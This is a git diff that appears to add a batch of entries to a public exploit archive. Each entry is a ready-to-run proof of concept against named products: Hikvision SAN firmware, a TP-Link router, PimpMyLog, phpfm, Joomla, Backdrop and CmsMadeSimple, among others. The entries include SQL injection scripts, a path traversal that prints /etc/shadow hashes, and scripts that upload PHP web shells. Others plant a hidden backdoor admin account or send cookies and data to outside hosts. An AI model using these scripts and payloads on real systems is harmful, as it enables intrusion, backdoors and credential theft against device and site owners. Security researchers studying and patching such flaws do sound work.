diff --git a/exploits/hardware/remote/51607.py b/exploits/hardware/remote/51607.py
new file mode 100755
index 000000000..653c89597
--- /dev/null
+++ b/exploits/hardware/remote/51607.py
@@ -0,0 +1,101 @@
+# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
+# Date: 16  July 2023
+# Exploit Author: Thurein Soe
+# CVE : CVE-2022-28171
+# Vendor Homepage: https://www.hikvision.com
+# Software Link: N/A
+# Refence Link: https://cve.report/CVE-2022-28171
+# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s
+'''
+Vendor Description:
+
+Hikvision is a world-leading surveillance manufacturer and supplier of
+video surveillance and Internet of Things (IoT) equipment for civilian and
+military purposes.
+Some Hikvision Hybrid SAN products were vulnerable to multiple remote code
+execution vulnerabilities such as command injection, Blind SQL injection,
+HTTP request smuggling, and reflected cross-site scripting.
+This resulted in remote code execution that allows an adversary to execute
+arbitrary operating system commands and more. However, an adversary must be
+on the same network to leverage this vulnerability to execute arbitrary
+commands.
+
+Vulnerability description:
+A manual test confirmed that The download type parameter was vulnerable to
+Blind SQL injection.I created a Python script to automate and enumerate SQL
+versions as the Application was behind the firewall and block all the
+requests from SQLmap.
+
+Request Body:
+GET
+/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'
+HTTP/1.1
+Host: X.X.X.X.12:2004
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
+Connection: close
+
+POC:
+'''
+import requests
+import time
+
+url = "http://X.X.X.X:2004/web/log/dynamic_log.php"
+
+# Function to check if the response time is greater than the specified delay
+def is_response_time_delayed(response_time, delay):
+    return response_time >= delay
+
+# Function to perform blind SQL injection and check the response time
+def perform_blind_sql_injection(payload):
+    proxies = {
+        'http': 'http://localhost:8080',
+        'https': 'http://localhost:8080',
+    }
+
+    params = {
+        'target': 'makeMaintainLog',
+        'downloadtype': payload
+    }
+    headers = {
+        'Accept-Encoding': 'gzip, deflate',
+        'Accept': '*/*',
+        'Accept-Language': 'en',
+        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
+        'Connection': 'close'
+    }
+
+    start_time = time.time()
+    response = requests.get(url, headers=headers, params=params,
+proxies=proxies)
+    end_time = time.time()
+
+    response_time = end_time - start_time
+    return is_response_time_delayed(response_time, 20)
+
+# Enumerate the MySQL version
+def enumerate_mysql_version():
+    version_Name = ''
+    sleep_time = 10  # Sleep time is 10 seconds
+
+    payloads = [
+        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},
+SLEEP({sleep_time}), 0))-- -"
+        for i in range(1, 11)
+        for mid in range(256)
+    ]
+
+    for payload in payloads:
+        if perform_blind_sql_injection(payload):
+            mid = payload.split("=")[-1].split(",")[0]
+            version_Name += chr(int(mid))
+
+    return version_Name
+
+# Enumeration is completed
+version_Name = enumerate_mysql_version()
+print("MySQL version is:", version_Name)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51603.py b/exploits/hardware/webapps/51603.py
new file mode 100755
index 000000000..9b5dc29ed
--- /dev/null
+++ b/exploits/hardware/webapps/51603.py
@@ -0,0 +1,42 @@
+# Exploit Title: ABB FlowX v4.00 - Exposure of Sensitive Information
+# Date: 2023-03-31
+# Exploit Author: Paul Smith
+# Vendor Homepage: https://new.abb.com/products/measurement-products/flow-computers/spirit-it-flow-x-series
+# Version: ABB Flow-X all versions before V4.00
+# Tested on: Kali Linux
+# CVE: CVE-2023-1258
+
+
+#!/usr/bin/python
+import sys
+import re
+from bs4 import BeautifulSoup as BS
+import lxml
+import requests
+
+# Set the request parameter
+url = sys.argv[1]
+
+
+def dump_users():
+    response = requests.get(url)
+
+    # Check for HTTP codes other than 200
+    if response.status_code != 200:
+    	print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.text)
+    	exit()
+
+    # Decode the xml response into dictionary and use the data
+    data = response.text
+    soup = BS(data, features="xml")
+    logs = soup.find_all("log")
+    for log in logs:
+    	test = re.search('User (.*?) logged in',str(log))
+    	if test:
+    		print(test.group(0))
+def main():
+	dump_users()
+
+
+if __name__ == '__main__':
+  	main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51606.txt b/exploits/hardware/webapps/51606.txt
new file mode 100644
index 000000000..85e647ae4
--- /dev/null
+++ b/exploits/hardware/webapps/51606.txt
@@ -0,0 +1,56 @@
+# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal
+# Date: 13/7/2023
+# Exploit Author: Anish Feroz (Zeroxinn)
+# Vendor Homepage: http://www.tp-link.com
+# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
+# Tested on: TP-Link TL-WR740N
+
+---------------------------POC---------------------------
+
+Request
+-------
+
+GET /help/../../../etc/shadow HTTP/1.1
+Host: 192.168.0.1:8082
+Authorization: Basic YWRtaW46YWRtaW4=
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+Response
+--------
+
+HTTP/1.1 200 OK
+Server: Router Webserver
+Connection: close
+WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"
+Content-Type: text/html
+
+<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
+<HTML>
+<HEAD><TITLE>TL-WR740N</TITLE>
+<META http-equiv=Pragma content=no-cache>
+<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
+<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
+<SCRIPT language="javascript" type="text/javascript"><!--
+if(window.parent == window){window.location.href="http://192.168.0.1";}
+function Click(){ return false;}
+document.oncontextmenu=Click;
+function doPrev(){history.go(-1);}
+//--></SCRIPT>
+root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
+Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
+bin::10933:0:99999:7:::
+daemon::10933:0:99999:7:::
+adm::10933:0:99999:7:::
+lp:*:10933:0:99999:7:::
+sync:*:10933:0:99999:7:::
+shutdown:*:10933:0:99999:7:::
+halt:*:10933:0:99999:7:::
+uucp:*:10933:0:99999:7:::
+operator:*:10933:0:99999:7:::
+nobody::10933:0:99999:7:::
+ap71::10933:0:99999:7:::
\ No newline at end of file
diff --git a/exploits/multiple/local/51571.txt b/exploits/multiple/local/51571.txt
new file mode 100644
index 000000000..61bc1d7c8
--- /dev/null
+++ b/exploits/multiple/local/51571.txt
@@ -0,0 +1,52 @@
+## Title:Microsoft Edge 114.0.1823.67 (64-bit) - Information Disclosure
+## Author: nu11secur1ty
+## Date: 07.06.2023
+## Vendor: https://www.microsoft.com/
+## Software: https://www.microsoft.com/en-us/edge?form=MA13FJ&exp=e415
+## Reference: https://portswigger.net/web-security/information-disclosure,
+https://www.softwaresecured.com/stride-threat-modeling/
+## CVE-2023-33145
+
+
+
+## Description:
+The type of information that could be disclosed if an attacker
+successfully exploited this vulnerability is data inside the targeted
+website like IDs, tokens, nonces, cookies, IP, User-Agent, and other
+sensitive information.
+The user would have to click on a specially crafted URL to be
+compromised by the attacker.
+In this example, the attacker use STRIDE Threat Modeling to spoof the
+victim to click on his website and done.
+This will be hard to detect.
+
+## Conclusion:
+Please be careful, for suspicious sites or be careful who sending you
+an link to open!
+
+## Staus: HIGH Vulnerability
+
+[+]Exploit:
+
+- Exploit Server:
+
+```js
+## This is a Get request from the server when the victims click! And
+it is enough to understand this vulnerability! =)
+
+<script> var i = new Image();
+i.src="PoCsess.php?cookie="+escape(document.cookie)</script>
+
+## WARNING: The PoCsess.php will be not uploaded for security reasons!
+## BR nu11secur1ty
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33146)
+
+## Proof and Exploit
+[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-edge.html)
+
+## Time spend:
+01:30:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51197.txt b/exploits/php/webapps/51197.txt
new file mode 100644
index 000000000..af245d9fd
--- /dev/null
+++ b/exploits/php/webapps/51197.txt
@@ -0,0 +1,54 @@
+# Exploit Title: PMB 7.4.6 - SQL Injection
+# Google Dork: inurl:opac_css
+# Date: 2023-01-06
+# Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo
+# Vendor Homepage: http://www.sigb.net
+# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
+# Affected versions : <= 7.4.6
+
+-==== Software Description ====-
+
+PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
+We are some librarians, users and developers deploring this state of affairs.
+
+PMB is based on web technology. This is what we sometimes call a 'web-app'.
+PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
+
+The main functions of PMB are :
+
+    * Supporting the UNIMARC format
+    * Authorities management (authors, publishers, series, subjects...)
+    * Management of loans, holds, borrowers...
+    * A user-friendly configuration
+    * The ability to import full bibliographic records
+    * A user-friendly OPAC integrating a browser
+    * Loans management with a module designed to serve even the very small establishments
+    * Serials management
+    * Simple administration procedures that can be handled easily even by the library staff...
+
+-==== Vulnerability ====-
+
+URL:
+    https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined
+
+Parameter:
+    id
+
+-==== Vulnerability Details ====-
+
+URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0)
+
+Tests performed:
+
+    if(now()=sysdate(),sleep(15),0) => 15.43
+    if(now()=sysdate(),sleep(6),0) => 6.445
+    if(now()=sysdate(),sleep(15),0) => 15.421
+    if(now()=sysdate(),sleep(3),0) => 3.409
+    if(now()=sysdate(),sleep(0),0) => 0.415
+    if(now()=sysdate(),sleep(0),0) => 0.413
+    if(now()=sysdate(),sleep(6),0) => 6.41
+
+Using SQLMAP :
+
+
+sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id"
\ No newline at end of file
diff --git a/exploits/php/webapps/51593.py b/exploits/php/webapps/51593.py
new file mode 100755
index 000000000..8ad4c9ff3
--- /dev/null
+++ b/exploits/php/webapps/51593.py
@@ -0,0 +1,69 @@
+# Exploit Title: PimpMyLog v1.7.14 - Improper access control
+# Date: 2023-07-10
+# Exploit Author: thoughtfault
+# Vendor Homepage: https://www.pimpmylog.com/
+# Software Link: https://github.com/potsky/PimpMyLog
+# Version: 1.5.2-1.7.14
+# Tested on: Ubuntu 22.04
+# CVE : N/A
+# Description: PimpMyLog suffers from improper access control on the account creation endpoint, allowing a remote attacker to create an admin account without any existing permissions. The username is not sanitized and can be leveraged as a vector for stored XSS. This allows the attacker to hide the presence of the backdoor account from legitimate admins.  Depending on the previous configuration, an attacker may be able to view sensitive information in apache, iis, nginx, and/or php logs. The attacker can view server-side environmental variables through the debug feature, which may include passwords or api keys.
+import requests
+import argparse
+from base64 import b64encode
+
+js = """var table = document.getElementById("userlisttable");
+var rows = table.getElementsByTagName("tr");
+for (var i = 0; i < rows.length; i++) {
+  var cells = rows[i].getElementsByTagName("td");
+  for (var j = 0; j < cells.length; j++) {
+    var anchors = cells[j].getElementsByTagName("a");
+    for (var k = 0; k < anchors.length; k++) {
+      if (
+        anchors[k].innerText === "{}" ||
+        anchors[k].innerText.includes("atob(") ||
+        anchors[k].querySelector("script") !== null
+      ) {
+        rows[i].parentNode.removeChild(rows[i]);
+      }
+    }
+  }
+}
+var userCountElement = document.querySelector('.lead');
+var userCountText = userCountElement.textContent;
+var userCount = parseInt(userCountText);
+if(!isNaN(userCount)){
+        userCount--;
+        userCountElement.textContent = userCount + ' Users';
+}"""
+
+payload = "<script>eval(atob('{}'));</script>"
+
+
+def backdoor(url, username, password):
+    config_url = url + '/inc/configure.php'
+
+    print("[*] Creating admin account...")
+    r = requests.post(config_url, data={'s':'authsave', 'u': username, 'p': password})
+    if r.status_code != 200:
+        print("[!] An error occured")
+        return
+
+    print("[*] Hiding admin account...")
+    base64_js = b64encode(js.format(username).encode()).decode()
+    xss_payload = payload.format(base64_js)
+
+    r = requests.post(config_url, data={'s':'authsave', 'u': xss_payload, 'p': password})
+    if r.status_code != 200:
+        print("[!] An error occured")
+        return
+
+
+    print("[*] Exploit finished!")
+
+parser = argparse.ArgumentParser()
+parser.add_argument('--url', help='The base url of the target', required=True)
+parser.add_argument('--username', default='backdoor', help='The username of the backdoor account')
+parser.add_argument('--password', default='backdoor', help='The password of the backdoor account')
+args = parser.parse_args()
+
+backdoor(args.url.rstrip('/'), args.username, args.password)
\ No newline at end of file
diff --git a/exploits/php/webapps/51594.py b/exploits/php/webapps/51594.py
new file mode 100755
index 000000000..d06f1c255
--- /dev/null
+++ b/exploits/php/webapps/51594.py
@@ -0,0 +1,39 @@
+# Exploit Title: phpfm v1.7.9 - Authentication type juggling
+# Date: 2023-07-10
+# Exploit Author: thoughtfault
+# Vendor Homepage: https://www.dulldusk.com/phpfm/
+# Software Link: https://github.com/dulldusk/phpfm/
+# Version: 1.6.1-1.7.9
+# Tested on: Ubuntu 22.04
+# CVE : N/A
+"""
+An authentication bypass exists in when the hash of the password selected by the user incidently begins with 0e, 00e, and in some PHP versions, 0x. This is because loose type comparision is performed between the password hash and the loggedon value, which by default for an unauthenticated user is 0 and can additionally be controlled by the attacker.  This allows an attacker to bypass the login and obtain remote code execution.
+
+A list of vulnerable password hashes can be found here.
+https://github.com/spaze/hashes/blob/master/md5.md
+"""
+import requests
+import sys
+
+if len(sys.argv) < 2:
+    print(f"[*] Syntax: ./{__file__} http://target/")
+    sys.exit(0)
+
+
+url = sys.argv[1].rstrip('/') + "/index.php"
+
+payload_name = "shell.php"
+payload = '<?php echo "I am a shell"; ?>'
+payload_url = url.replace("index.php", payload_name)
+
+headers = {"Accept-Language": "en-US,en;q=0.5", "Cookie": "loggedon=0"}
+files = {"dir_dest": (None, "/srv/http/"), "action": (None, "10"), "upfiles[]": ("shell.php", payload) }
+
+requests.post(url, headers=headers, files=files)
+
+r = requests.get(payload_url)
+if r.status_code == 200:
+    print(f"[*] Exploit sucessfull: {payload_url}")
+    print(r.text)
+else:
+    print(f"[*] Exploit might have failed, payload url returned a non-200 status code of: {r.status_code}" )
\ No newline at end of file
diff --git a/exploits/php/webapps/51595.py b/exploits/php/webapps/51595.py
new file mode 100755
index 000000000..a7437cbd2
--- /dev/null
+++ b/exploits/php/webapps/51595.py
@@ -0,0 +1,100 @@
+# Exploit Title: Joomla! com_booking component 2.4.9 - Information Leak (Account enumeration)
+# Google Dork: inurl:"index.php?option=com_booking"
+# Date: 07/12/2023
+# Exploit Author: qw3rTyTy
+# Vendor Homepage: http://www.artio.net/
+# Software Link: http://www.artio.net/downloads/joomla/book-it/book-it-2-free/download
+# Version: 2.4.9
+# Tested on: Slackware/Nginx/Joomla! 3.10.11
+#
+##
+# File: site/booking.php
+#
+# <?php
+# [...]
+#18 include_once (JPATH_COMPONENT_ADMINISTRATOR . DS . 'booking.php');
+# [...]
+#
+# File: admin/booking.php
+#
+# <?php
+# [...]
+#104 if (class_exists(($classname = AImporter::controller()))) {
+#105 $controller = new $classname();
+#106 /* @var $controller JController */
+#107 $controller->execute(JRequest::getVar('task'));
+#108 $controller->redirect();
+#109 }
+# [...]
+#
+# File: admin/controllers/customer.php
+#
+# <?php
+# [...]
+#240 function getUserData() {
+#241 $user = JFactory::getUser(JRequest::getInt('id'));
+#242 $data = array('name' => $user->name, 'username' => $user->username, 'email' => $user->email);
+#243 die(json_encode($data));
+#244 }
+# [...]
+#
+# A following GET request is equivalent to doing a query like 'SELECT name, username, email FROM abcde_users WHERE id=123'.
+#
+# curl -X GET http://target/joomla/index.php?option=com_booking&controller=customer&task=getUserData&id=123
+#
+# So, an attacker can easily enumerate all accounts by bruteforcing.
+#
+##
+import argparse
+import urllib.parse
+import requests
+from sys import exit
+from time import sleep
+
+def enumerateAccounts(options):
+    i = 1
+    url = options.url
+    url = url + "/index.php?option=com_booking&controller=customer&task=getUserData&id="
+
+    while True:
+        try:
+            response = requests.get("{}{}".format(url, str(i)))
+
+            if response.status_code == 200:
+                try:
+                    jsondocument = response.json()
+                    if jsondocument["name"] != None:
+                        print(jsondocument)
+                except requests.exceptions.JSONDecodeError:
+                    raise
+                else:
+                    break
+            except Exception as ex:
+                print(ex)
+                break
+
+        i += 1
+
+def main():
+    p = argparse.ArgumentParser()
+    p.add_argument("-u", "--url", type=str, required=True)
+    parsed = p.parse_args()
+
+    try:
+        t = urllib.parse.urlparse(parsed.url)
+    except ValueError as ex:
+        print(ex)
+        exit()
+
+    if not t[0].startswith("http") and not t[0].startswith("https"):
+        print("Improper URL given.")
+        exit()
+
+    if len(t[1]) == 0:
+        print("Improper URL given.")
+        exit()
+
+    enumerateAccounts(parsed)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51596.txt b/exploits/php/webapps/51596.txt
new file mode 100644
index 000000000..d5a3b8fa0
--- /dev/null
+++ b/exploits/php/webapps/51596.txt
@@ -0,0 +1,65 @@
+## Title: Vaidya-Mitra 1.0 - Multiple SQLi
+## Author: nu11secur1ty
+## Date: 07.12.2023
+## Vendor: https://mayurik.com/
+## Software: free:
+https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html,
+https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The `useremail` parameter appears to be vulnerable to SQL injection
+attacks. The payload '+(select
+load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'
+was submitted in the useremail parameter. This payload injects a SQL
+sub-query that calls MySQL's load_file function with a UNC file path
+that references a URL on an external domain. The application
+interacted with that domain, indicating that the injected SQL query
+was executed. The attacker easily can steal all information from this
+system, like
+login credentials, phone numbers and etc.
+
+STATUS: HIGH Vulnerability
+
+[+]Payload:
+```mysql
+---
+Parameter: useremail (POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
+or GROUP BY clause
+    Payload: useremail=mayuri.infospace@gmail.com'+(select
+load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
+RLIKE (SELECT (CASE WHEN (5532=5532) THEN
+0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select
+load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+''
+ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+    Payload: useremail=mayuri.infospace@gmail.com'+(select
+load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
+AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT
+(ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
+'gHln'='gHln&userpassword=rootadmin
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
+    Payload: useremail=mayuri.infospace@gmail.com'+(select
+load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
+OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND
+'ZWBa'='ZWBa&userpassword=rootadmin
+---
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)
+
+## Proof and Exploit:
+[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)
+
+## Time spend:
+00:27:00
\ No newline at end of file
diff --git a/exploits/php/webapps/51597.txt b/exploits/php/webapps/51597.txt
new file mode 100644
index 000000000..e0aca73a4
--- /dev/null
+++ b/exploits/php/webapps/51597.txt
@@ -0,0 +1,124 @@
+#Exploit Title: Backdrop Cms v1.25.1 - Stored Cross-Site Scripting (XSS)
+#Application: Backdrop Cms
+#Version: v1.25.1
+#Bugs:  Stored Xss
+#Technology: PHP
+#Vendor URL: https://backdropcms.org/
+#Software Link: https://github.com/backdrop/backdrop/releases/download/1.25.1/backdrop.zip
+#Date of found: 12-07-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+
+1. login to account
+2. go to http://localhost/backdrop/?q=admin/config/system/site-information
+3. upload svg file
+
+"""
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+"""
+4. go to svg file (http://localhost/backdrop/files/malas_2.svg)
+
+
+Request
+
+POST /backdrop/?q=admin/config/system/site-information HTTP/1.1
+Host: localhost
+Content-Length: 2116
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVXWRsHHM3TVjALpg
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/backdrop/?q=admin/config/system/site-information
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: SESS31b3aee8377692ae3f36f0cf7fe0e752=ZuJtSS2iu5SvcKAFtpK8zPAxrnmFebJ1q26hXhAh__E
+Connection: close
+
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="site_name"
+
+My Backdrop Site
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="site_slogan"
+
+
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="site_mail"
+
+admin@admin.com
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="files[site_logo_upload]"; filename="malas.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="site_logo_path"
+
+
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="files[site_favicon_upload]"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="site_favicon_path"
+
+core/misc/favicon.ico
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="site_frontpage"
+
+home
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="site_403"
+
+
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="site_404"
+
+
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="form_build_id"
+
+form-PnR6AFEKCB5hAWH3pDT2J0kkZswH0Rdm0qbOFGqNj-Q
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="form_token"
+
+siOWtyEEFVg7neDMTYPHVZ2D3D5U60S38l_cRHbnW40
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="form_id"
+
+system_site_information_settings
+------WebKitFormBoundaryVXWRsHHM3TVjALpg
+Content-Disposition: form-data; name="op"
+
+Save configuration
+------WebKitForm
\ No newline at end of file
diff --git a/exploits/php/webapps/51598.sh b/exploits/php/webapps/51598.sh
new file mode 100755
index 000000000..eb48a9819
--- /dev/null
+++ b/exploits/php/webapps/51598.sh
@@ -0,0 +1,53 @@
+#!/bin/bash
+# Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
+# Date: July 12 2023
+# Exploit Author: 1337kid
+# Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
+# Version: 1.0
+# Tested on: Ubuntu
+# CVE : CVE-2023-37629
+#
+# chmod +x exploit.sh
+# ./exploit.sh web_url
+# ./exploit.sh http://127.0.0.1:8080/
+
+echo "   _____   _____   ___ __ ___ ____   ________ __ ___ ___ "
+echo "  / __\\ \\ / / __|_|_  )  \\_  )__ /__|__ /__  / /|_  ) _ \\"
+echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /"
+echo "  \\___| \\_/ |___| /___\\__/___|___/  |___//_/\\___/___|/_/ "
+echo "                         @1337kid"
+echo
+
+if [[ $1 == '' ]]; then
+    echo "No URL specified!"
+    exit
+fi
+
+base_url=$1
+
+unauth_file_upload() {
+    # CVE-2023-37629 - File upload vuln
+    echo "Generating shell.php"
+#===========
+cat > shell.php << EOF
+<?php system(\$_GET['cmd']); ?>
+EOF
+#===========
+    echo "done"
+    curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null
+    req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" |  head -1 | awk '{print $2}')
+    if [[ $req == "200" ]]; then
+        echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php"
+    else
+        echo "Failed to upload a shell"
+    fi
+
+}
+
+req=$(curl -I -s $base_url | head -1 | awk '{print $2}')
+if [[ $req -eq "200" ]]; then
+    unauth_file_upload
+else
+    echo "Error"
+    echo "Status Code: $req"
+fi
\ No newline at end of file
diff --git a/exploits/php/webapps/51599.txt b/exploits/php/webapps/51599.txt
new file mode 100644
index 000000000..b39dfc5ca
--- /dev/null
+++ b/exploits/php/webapps/51599.txt
@@ -0,0 +1,60 @@
+#Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
+#Application: CmsMadeSimple
+#Version: v2.2.17
+#Bugs:  SSTI
+#Technology: PHP
+#Vendor URL: https://www.cmsmadesimple.org/
+#Software Link: https://www.cmsmadesimple.org/downloads/cmsms
+#Date of found: 13-07-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+Steps:
+
+1. Login to test user account
+2. Go to Content Manager
+3. Add New Content
+4. set as
+'''
+{$smarty.version}
+{{7*7}}
+{$smarty.now}
+{$smarty.template}
+<img src=YOU-SERVER/{$smarty.cookies.CMSSESSID852a6e69ca02}>
+<img src=YOU-SERVER/{$smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1}>
+<img src=YOU_SERVER/{$smarty.cookies.__c}>
+'''
+to conten_en section.
+
+5.If any user visit to page, Hacker hijack all cookie
+
+payload: %3Cp%3E%7B%24smarty.version%7D+%7B%7B7*7%7D%7D+%7B%24smarty.now%7D+%7B%24smarty.template%7D+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.CMSSESSID852a6e69ca02%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.34a3083b62a225efa0bc6b5b43335d226264c2c1%7D%22+%2F%3E+%3Cimg+src%3D%22https%3A%2F%2Fen3uw3qy2e0zs.x.pipedream.net%2F%7B%24smarty.cookies.__c%7D%22+%2F%3E%3C%2Fp%3E
+
+POC Request
+
+POST /admin/moduleinterface.php?mact=CMSContentManager,m1_,admin_editcontent,0&;__c=1c2c31a1c1bff4819cd&;m1_content_id=81&showtemplate=false HTTP/1.1
+Host: localhost
